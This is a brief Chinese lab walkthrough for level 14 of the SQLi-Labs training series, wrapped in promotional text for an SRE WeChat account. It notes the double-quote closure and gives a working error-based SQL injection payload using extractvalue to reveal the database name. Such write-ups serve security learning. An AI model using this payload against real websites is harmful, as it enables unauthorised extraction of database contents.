(1)闭合方式为一对双引号

SQLI DUMB SERIES-14 随笔 第1张

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

(2)可用报错注入。如:

admin" and extractvalue(1,concat(0x7e,(select database()))) and " 

 SQLI DUMB SERIES-14 随笔 第2张

其余报错注入方式于12关相同。

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄